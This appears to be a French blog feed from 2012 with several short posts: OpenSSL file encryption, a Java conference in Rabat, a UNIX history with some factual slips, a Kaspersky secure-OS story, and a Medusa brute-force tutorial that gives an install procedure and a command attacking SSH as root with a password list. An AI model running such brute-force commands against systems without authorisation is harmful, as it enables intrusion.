OpenSSL via son utilitaire en ligne de commande permet également de chiffrer et de déchiffrer des fichiers (documents, images, vos vidéos de “vacances” ,…) avec différents algo tels que blowfish, (triple) DES, DSA, RC5, RSA,…

En pratique pour chiffrer un fichier ça se passe comme ceci :

openssl enc -e -aes-256-cbc -in file.txt -out file.enc.txt

Et pour déchiffrer :

openssl enc -d -aes-256-cbc -in file.enc.txt -out file.dec.txt

L’option e spécifie qu’on chiffre (encryption en anglais) et d qu’on déchiffre (decryption).Vous pouvez aussi remplacer -aes-256-cbc par l’algo de votre choix.

La première édition de la conférence JMaghreb à l’EMI

noreply@blogger.com (Anass Hajari) — Sun, 28 Oct 2012 22:09:00 +0000

Avec le soutien d’Oracle, JBoss/Redhat, Safran Morpho, Google, Springsource/Vmware, Objis et Zeroturnaround, le groupe MoroccoJUG -Morocco Java user Group- (www.moroccojug.org) organise les 2 et 3 Novembre 2012 la première édition de la conférence JMaghreb (http://jmaghreb.moroccojug.org) en partenariat avec l’Ecole Mohammadia d’Ingénieurs (EMI).

Des conférences plénières et des ateliers pratiques sur les dernières technologies Java et les technologies connexes sont au programme et seront animés par des experts de notoriété internationale.

Cette manifestation, qui aura lieu dans les locaux de l’EMI à Rabat, a pour objectifs d’élargir la communauté Java au Maroc et de servir de plateforme de rencontre, d’échange et de réseautage entre des entreprises, des professionnels et des universitaires opérant dans le domaine des technologies de l’information (IT).

L’événement est ouvert gratuitement aux développeurs et professionnels aussi bien qu’aux passionnés des nouvelles technologies au Maroc.

Les organisateurs prévoient la participation de plus de 700 personnes, ce qui ferait de cette manifestation l’une des plus grandes rencontres IT à accès libre organisée en Afrique du nord.

Qu’est ce qu’ UNIX ?

noreply@blogger.com (Anass Hajari) — Sun, 28 Oct 2012 22:01:00 +0000

UNIX est un système d’exploitation de AT&T, basé sur le langage C , à usage principalement professionnel et universitaire, fonctionnant sur le principe que les relations entre les programmes sont plus importantes que les programmes eux-mêmes, multitâche et, multiutilisateur, mis au point en 1969 par Ken Thompson. Les UNIX sont tous ces systèmes qui suivent la norme POSIX (acronyme de Portable Operating System Interface, dont le X exprime l’héritage UNIX de l’API).

Il existe différentes versions d’Unix (IBM AIX, SCO, Linux, Sun Solaris,BSD, HPUX de Hewlette Packard,etc…) qui reste le système d’exploitation natif d’Internet en étant construit autour des mêmes protocoles. Utilisé essentiellement pour faire fonctionner les serveurs. Une des versions populaires d’Unix (BSD) a été financée par le gouvernement américain pour devenir le système standard de l’ancètre de l’Internet et le réseau Usenet est né au sein de la communauté Unix.

Son nom est un clin d’oeil à son prédécesseur, MULTICS, Unix étant censé être le Système d’Explotation ultime. Unix s’écrivait à l’origine UNICS, pour UNIplexed Information and Compluting System. GNU/Linux et Mac OS X sont les UNIX les plus populaires.

UNIX propose plusieurs interpréteurs de commandes comme Bourne, C, Korn et bash. On les nomme Shell. Ils permettent d’avoir une interface et ligne de commandes.

Pour plus d’explication lisons ce que nous propose « comment ça marche » :

Le système UNIX
Le système Unix est un système d’exploitation multi-utilisateurs, multi-tâches, ce qui signifie qu’il permet à un ordinateur mono ou multi-processeurs de faire exécuter simultanément plusieurs programmes par un ou plusieurs utilisateurs. Il possède un ou plusieurs interpréteurs de commandes (shell) ainsi qu’un grand nombre de commandes et de nombreux utilitaires (assembleur, compilateurs pour de nombreux langages, traitements de texte, messagerie électronique, …). De plus il possède une grande portabilité, ce qui signifie qu’il est possible de mettre en oeuvre un système Unix sur la quasi-totalité des plates-formes matérielles.

De nos jours les systèmes Unix sont très présents dans les milieux professionnels et universitaires grâce à leur grande stabilité, leur niveau de sécurité élevé et le respect des grands standards, notamment en matière de réseau.

L’histoire des systèmes UNIX
Le premier système «Unix» a été mis au point par Ken Thompson dans les laboratoires Bell AT&T à Murray Hill dans le New Jersey aux Etats-Unis à partir de 1965. Le but de Ken Thompson était de mettre au point un système d’exploitation interactif simple, nommé « Multics » (Multiplexed Information and Computing System) afin de faire tourner un jeu qu’il avait créé (space travel, une simulation du système solaire).

Un consortium composé du MIT (Massassuchetts Institue of Technology), de General Electric Co. et de Bell Lab se forma ainsi autour de Multics.

En avril 1969 les laboratoires AT&T décidèrent d’utiliser le système GECOS (General Electric Comprehensive Operating System ) en lieu et place de Multics. Or Ken Thompson et Dennis Ritchie qui rejoignirent l’équipe eûrent besoin de faire fonctionner le jeu space travel sur une plus petite machine (un DEC PDP-7, Programmed Data Processor possédant uniquement 4K de mémoire pour faire fonctionner les programmes des utilisateurs), c’est la raison pour laquelle il réécrirent le système afin de créer une version réduite de Multics appelée UNICS (UNiplexed Information and Computing Service), rapidement contractée en Unix.

La date du 1er janvier 1970 est considérée comme étant la date de naissance du système Unix, ce qui explique pourquoi toutes les horloges système des systèmes d’exploitation Unix démarrent à partir de cette époque.

Parallèlement à ces activités, D.Ritchie participa grandement à la définition du langage C (puisqu’il est considéré comme un de ses créateurs avec B.W.Kernighan), ainsi l’ensemble du système fût entièrement réécrit en langage C en 1973 et baptisé Unix Time-Sharing System (TSS).
Lorsque le système passa à la version 7 en 1979, l’évolution s’accompagna de nombreuses modifications notables telles que :

la suppression du bridage lié à la taille des fichiers,
une meilleure portabilité du système (fonctionnement sur de nombreuses plates-formes matérielles),
l’ajout de nombreux utilitaires.

Un décret datant de 1956 empêchait l’entreprise ATT, dont dépendait Bell Labs, de commercialiser autre chose que des équipements téléphoniques ou télégraphiques, c’est la raison pour laquelle la décision fût prise en 1973 de distribuer les sources d’UNIX dans les universités à des fins éducatives.

Dès fin 1977 des chercheurs de l’Université de Californie redéveloppèrent une version d’Unix à partir des sources fournies par AT&T afin de faire fonctionner le système sur leurs plates-formes VAX et la baptisèrent BSD pour Berkeley Software Developpement.

Ainsi deux branches de développement des sources virent le jour :

La branche d’AT&T qui allait devenir System V de UNIX System Labs (USL)
BSD (Berkeley Software Developpement) développé par l’Université de Californie
En 1977 AT&T mit les sources d’UNIX à la disposition des autres entreprises, si bien qu’un grand nombre d’UNIX-like furent développés :

AIX, Unix commercial basé sur System V développé en février 1990 par IBM
Sun Solaris, Unix commercial basé sur System V et BSD développé par SUN Microsystems
HP-UX, Unix commercial basé sur BSD développé à partir de 1986 par Hewlett Packard
Ultrix, Unix commercial développé par DEC
IRIX, Unix commercial développé par SGI
Unixware, Unix commercial développé par Novell
Unix SCO, Unix commercial basé sur System V développé dès 1979 par Santa Cruz Operations et Hewlett Packard
Tru64 UNIX, Unix commercial développé par Compaq
En 1983 AT&T eût le droit de commercialiser son Unix, ce qui marqua l’apparition de UNIX System V, la version commerciale de son système Unix.

En 1985 un professeur hollandais, nommé Andrew Tannenbaum, développa un système d’exploitation minimal, baptisé Minix, afin d’enseigner la programmation système à ses étudiants.
En 1991 un étudiant finlandais, Linus Torvalds, décida de concevoir, sur le modèle Minix, un système d’exploitation capable de fonctionner sur les architectures de type 386.
Il baptisa ce système d’exploitation « Linux » et posta le message suivant sur le groupe de discussion comp.os.minix :

Hello everybody out there using minix- I’m doing a (free) operating system (just a hobby,
won’t be big and professional like gnu) for 386(486) AT clones.
Voici un schéma non exhaustif retraçant globalement l’apparition des principaux systèmes de type Unix :

Le standard UNIX
Etant donné le grand nombre de systèmes Unix développés sur la base du System V de AT&T ou bien de BSD, la question d’un standard Unix s’est posée dès 1981 sur le groupe de discussion /etc/group afin d’assurer une portabilité maximale entre les systèmes :

en 1983, AT&T publie SVID (System V Interface Definition) décrivant le System V. Cette première éfinition est différente de POSIX
en 1984 le groupe /etc/group publie POSIX, une série de standards développés sous couvert de l’IEEE ( Institute of Electrical and Electronics Engineers). POSIX est ainsi également connu sous le nom IEEE P1003.
à la même époque, un consortium de constructeurs (Sun, IBM, HP, DEC, AT&T, Unisys, ICL, …) publie le standard X/Open Portability Guide Issue 3 (XPG3). Ce standard s’occupe tout particulièrement des différences issues de la localisation géographique (date, alphabet, …).

Medusa 2.0 : Attaque par force brute

noreply@blogger.com (Anass Hajari) — Sun, 28 Oct 2012 21:52:00 +0000

Medusa est un logiciel disponible sous Linux permettant de tester la robustesse de différents services au moyen d’une attaque de type brute force.

Voici la liste des services pouvant être testés avec cet outil :

AFP
CVS
FTP
HTTP
IMAP
MS-SQL
MySQL
NetWare NCP
NNTP
PcAnywhere
POP3
PostgreSQL
REXEC
RLOGIN
RSH
SMBNT
SMTP-AUTH
SMTP-VRFY
SNMP
SSHv2
Subversion (SVN)
Telnet
VMware Authentication Daemon (vmauthd)
VNC
Generic Wrapper
Web Form

Il est possible d’ajouter, grâce à une conception modulaire, des fonctionnalités supplémentaires pour gérer de nouveaux services. De plus, l’outil propose d’effectuer le brute force sur plusieurs machines, utilisateurs ou mots de passes en même temps .

Le 10 Février est sorti la version 2.0 de l’outil, qui apporte quelques correctifs – voir:

ChangeLog

Télécharger Medusa-2.0.tar.gz

Installation (Debian)

#apt-get install build-essential libpcre3-dev libssl-dev libncp libncp-dev libpq5 libpq-dev libssh2-1 libssh2-1-dev libsvn-dev
#tar -xvzf Medusa-2.0.tar.gz
#cd Medusa-2.0
#./configure
#make && make install
#cd src
#./medusa

Exemple d’utilisation

Voir les modules installés :

#medusa -d

Exemple d’une attaque sur le service SSH vers l’adresse IP 192.168.0.2 :

#medusa -h 192.168.0.2 -u root -P /home/nico/dico.txt -M ssh

Virus & Anti-Virus

noreply@blogger.com (Anass Hajari) — Sun, 28 Oct 2012 21:41:00 +0000

Une vidéo assez intéressante sur l’évolution des virus et antivirus selon FSecure commençant par les premiers virus, les débuts de la protection antivirale en passant par Conficker & CO pour arriver au Cloud Security.

Un coup d’oeil sur le data center de Google

noreply@blogger.com (Anass Hajari) — Sun, 28 Oct 2012 21:32:00 +0000

La visite d’un datacenter de Google situé à Lenoir en Caroline du Nord, en mode « Streetview ».

Voici une vidéo d’intro pour vous mettre l’eau à la bouche…

Kaspersky développe son propre OS sécurisé

noreply@blogger.com (Anass Hajari) — Sun, 28 Oct 2012 21:20:00 +0000

Devant la complexité sans précédent des dernières cyberattaques massives, Kaspersky Labs décide de prendre les choses en main et propose son propre OS sécurisé. La compagnie engage son expertise et son expérience en matière de sécurité pour concevoir et déployer un système d’exploitation sécurisé pour des systèmes jugés d’une « importance capitale ». Ceci étant dans le but de fournir une couche supplémentaire de protection contre malwares et autres attaques intelligentes.

Selon le blog officiel du fondateur Eugene Kaspersky, ce système d’exploitation serait destiné à bloquer les formes les plus modernes et sophistiquées que peut prendre un logiciel malveillant tel que le ver informatique Stuxnet, et sa relève : Duqu , Flame et Gauss.

Dans le blog, on retrouve ces précisions :

« Notre système est fait sur mesure, développé pour résoudre une tâche spécifique limitée et non pas pour jouer à Half-Life, éditer vos vidéos de vacances, ou chatter sur les médias sociaux. Nous travaillons sur des méthodes de conception de logiciel qui, délibérément, ne seront pas en mesure de procéder à une quelconque activité « behind-the-scenes » non déclarée. C’est ça le plus important : l’impossibilité d’exécuter du code tiers, de s’introduire dans le système ou d’exécuter des applications non autorisées sur notre OS ; et c’est à la fois démontrable et vérifiable. »

D’après le fondateur, plutôt que de réécrire le système de zéro, Kaspersky se base sur les plateformes existantes pour fournir un contrôle sur les systèmes existants et garantir la réception des rapports de données fiables sur les opérations du système.

Le logiciel aura pour mission de fournir un environnement sécurisé, en l’isolant des logiciels malveillants et en veillant à ce qu’ils ne parviennent pas au noyau et aux éléments essentiels des systèmes.

Cependant, Kaspersky ne fournit pas de détails sur le projet, pour cause de confidentialité et de crainte que leurs idées n’inspirent un peu trop la concurrence.

En tout cas, l’OS de Kaspersky a déjà de quoi faire ses preuves. Après le module Flame, les chercheurs en sécurité de Kaspersky Lab ont découvert son cousin MiniFlame, basé sur la même architecture que Flame et destiné au vol de données et aux accès directs au système infecté. Selon Kaspersky Lab il constituerait un outil d’attaque de très haute précision.